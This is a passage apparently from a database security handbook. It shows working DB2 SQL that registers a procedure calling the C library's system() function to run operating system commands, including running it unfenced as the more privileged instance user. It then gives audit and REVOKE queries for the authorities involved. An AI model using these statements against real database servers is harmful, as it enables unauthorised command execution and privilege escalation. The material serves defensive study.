Running Commands Through DB2

Running operating system commands is as easy as creating a routine in DB2.

On Windows:

 CREATE PROCEDURE rootdb2 (IN cmd varchar(200))
   EXTERNAL NAME 'e:\winnt\system32\msvcrt!system'
   LANGUAGE C
   DETERMINISTIC
   PARAMETER STYLE DB2SQL

 call rootdb2 ('dir > c:\db2.txt')

On Linux:

 CREATE PROCEDURE rootdb2 (IN cmd varchar(200))
   EXTERNAL NAME '/lib/libc.so.6!system'
   LANGUAGE C
   DETERMINISTIC
   PARAMETER STYLE DB2SQL

 call rootdb2 ('id > /tmp/id.txt')

If you look at the contents of id.txt, you find the following:

 uid=110(db2fenc1) gid=103(db2fgrp1) groups=102(db2grp1),101(dasadm1) 

The command runs as the db2fenc1 user. If you want to run commands as the db2inst1 user (which has greater privileges), add the NOT FENCED keyword when creating the procedure. When this is done, the output of id shows:

 uid=109(db2inst1) gid=102(db2grp1) groups=102(db2grp1),101(dasadm1) 

To prevent users from running operating system commands this way, ensure that they haven't been assigned the EXTERNALROUTINEAUTH authority.
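One way to check for this, as an added example that is not from the book: EXTERNALROUTINEAUTH and NOFENCEAUTH are columns of the SYSCAT.DBAUTH catalog view, and existing external routines are listed in SYSCAT.ROUTINES. The grantee APPUSER is a placeholder.

```sql
-- Added example (not from the book). APPUSER is a placeholder grantee.

-- 1. Who may register external routines, and who may register them NOT FENCED?
--    EXTERNALROUTINEAUTH = 'Y': grantee holds CREATE_EXTERNAL_ROUTINE.
--    NOFENCEAUTH = 'Y':         grantee holds CREATE_NOT_FENCED_ROUTINE.
SELECT GRANTEE, GRANTEETYPE, EXTERNALROUTINEAUTH, NOFENCEAUTH
  FROM SYSCAT.DBAUTH
 WHERE EXTERNALROUTINEAUTH = 'Y'
    OR NOFENCEAUTH = 'Y'
 ORDER BY GRANTEE;

-- 2. Which external C routines already exist? Flag the ones that run
--    unfenced (as the instance owner) or whose entry point is system(),
--    as in the rootdb2 procedures above.
SELECT ROUTINESCHEMA,
       ROUTINENAME,
       SPECIFICNAME,
       FENCED,
       IMPLEMENTATION,
       CASE WHEN FENCED = 'N' THEN 'UNFENCED' ELSE '' END AS FENCE_FLAG,
       CASE WHEN LOWER(IMPLEMENTATION) LIKE '%!system%'
            THEN 'CALLS system()' ELSE '' END            AS ENTRY_FLAG
  FROM SYSCAT.ROUTINES
 WHERE ORIGIN = 'E'          -- user-defined external routine
   AND LANGUAGE = 'C'
 ORDER BY ROUTINESCHEMA, ROUTINENAME;

-- 3. Remove the authorities from accounts that do not need them.
REVOKE CREATE_EXTERNAL_ROUTINE   ON DATABASE FROM USER APPUSER;
REVOKE CREATE_NOT_FENCED_ROUTINE ON DATABASE FROM USER APPUSER;
```

A user can also hold either authority through a group, so rows with GRANTEETYPE 'G' in the first result need the same review.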



Database Hacker's Handbook. Defending Database Servers
ISBN: 0764578014
EAN: 2147483647
Year: 2003
Pages: 156
